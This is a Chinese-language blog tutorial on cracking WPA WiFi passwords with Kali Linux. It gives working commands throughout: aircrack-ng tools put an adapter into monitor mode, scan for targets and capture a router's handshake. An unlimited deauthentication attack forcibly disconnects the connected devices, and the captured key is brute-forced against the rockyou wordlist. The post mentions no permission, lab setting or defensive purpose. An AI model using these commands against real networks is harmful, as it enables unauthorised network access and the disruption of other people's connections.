不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

kali抓包破解WIFI密码

0x01 前言

使用kali破解wifi密码,如果kali安装在虚拟机,需要一个外置usb网卡。

0x02 开始

查看插入的网卡

打开kali虚拟机,插入USB无线网卡,打开终端

iwconfig

查看无线网卡

airmon-ng
上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。

开启网卡监听模式,记录Interface名称,杀掉其他使用WiFi进程

airmon-ng start wlan0
如果有下图提示表示有其他网卡处于监控模式。
使用
airmon-ng check kill
结束其他使用WIFI进程
在执行
airmon-ng start wlan0
记住interface名称。

 

 

扫描信号

airodump-ng wlan0mon

  • BSSID是AP端的MAC地址
  • PWR是信号强度,数字越小越好
  • Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
  • CH是对应路由器的所在信道
  • ESSID是对应路由器的名称

找到目标后,ctrl + c 中止

抓取握手包

airodump-ng -c 11 -w ./test --bssid 78:44:FD:83:0B:2C wlan0mon
airodump-ng -c <AP的信道> -w <抓取握手包的存放位置名称> --bssid <AP的MAC地址> <你的的Interface名称>

解除认证攻击

保持上一个terminal窗口的运行状态,打开一个新的terminal,进行解除认证攻击
强制连接到wifi的设备重新连接路由器,掉线设备重连后,如图所示位置显示WPA handshake --即成功抓取到握手包。
两个terminal使用ctrl+c终止攻击和握手抓包。

aireplay-ng -0 0 -a 9C:A6:15:D0:04:C9 -c D8:32:E3:A7:B9:6F wlan0mon
aireplay-ng -<攻击模式,我们这里使用 解除认证攻击(数字0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <interface名称>

关闭无线网卡的监听模式

airmon-ng stop wlan0mon

使用字典暴力破解

kali下自带一份无线密码字典 –>/usr/share/wordlists/rockyou.txt.gz
解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz

aircrack-ng  -w  /usr/share/wordlists/rockyou.txt  -b  BC:46:99:3D:66:D6 tplink-01.cap
#-w指定 密码字典 -b指定路由器的MAC地址

爆破成功后,如图区域位置显示KEY FOUND!字样,中括里为AP端的密码。

赞(1)
未经允许不得转载:seo优化_前端开发_渗透技术 » kali抓包破解WIFI密码

相关推荐

  • 暂无文章